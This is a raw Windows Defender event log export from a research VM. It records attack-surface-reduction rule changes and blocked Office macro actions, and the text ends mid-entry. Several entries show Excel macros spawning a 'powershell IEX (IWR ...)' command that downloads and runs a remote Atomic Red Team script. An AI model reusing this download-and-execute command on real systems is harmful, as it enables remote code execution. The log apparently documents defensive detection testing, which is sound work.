112103000x80000000000000002975Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:29:48.984Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002972Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:27:30.572Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000 112103000x80000000000000002971Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T16:27:18.000Zresearchvmhaa\researchC:\Windows\System32\rundll32.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.912.01.1.23100.2009ENT\ConsRC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"C:\Users\research\Desktop\macs\mac5.xls0x00000000 112103000x80000000000000002964Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:46.183Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"C:\Users\research\Desktop\macs\mac7.xls0x00000000 112103000x80000000000000002963Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:37.633Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"C:\Users\research\Desktop\macs\mac8.xls0x00000000 112103000x80000000000000002961Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:14.127Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac6.xls"C:\Users\research\Desktop\macs\mac6.xls0x00000000 500704000x80000000000000002911Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 500704000x80000000000000002908Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x1HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x0 500704000x80000000000000002907Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x1HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x0 11/20/2023 03:31:50 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2779 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\SacLearningModeSwitch = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SacLearningModeSwitch = 0x1 11/20/2023 03:31:45 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2772 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 11/19/2023 03:39:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2740 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value: 11/19/2023 01:31:53 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2597 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 11/18/2023 12:31:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2496 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value: 11/17/2023 05:29:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2398 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:29:44.894Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls" Involved File: C:\Users\research\Desktop\macs\mac8.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2397 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2396 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2395 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2394 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2393 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2392 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2391 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2390 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2389 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2388 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2387 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2386 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2385 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2384 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2383 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1 11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2382 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1 11/17/2023 05:27:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2379 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:28.753Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls" Involved File: C:\Users\research\Desktop\macs\mac7.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:27:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2378 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:18.518Z User: researchvmhaa\research Path: C:\Windows\System32\rundll32.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls" Involved File: C:\Users\research\Desktop\macs\mac5.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:27:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2377 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:11.636Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac1.xls" Involved File: C:\Users\research\Desktop\macs\mac1.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:26:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2376 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:26:53.781Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macrotestinglive.xls" Involved File: C:\Users\research\Desktop\macrotestinglive.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:23:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1129 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2360 Keywords=None TaskCategory=None OpCode=Info Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Involved File: 11/17/2023 05:23:35 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1129 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2359 Keywords=None TaskCategory=None OpCode=Info Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Involved File: 11/17/2023 05:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2358 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T17:23:27.874Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2357 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T17:23:27.753Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:18:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2341 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-17T17:18:38.414Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:18:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2340 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:18:05.565Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: powershell.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:17:08 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2339 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not 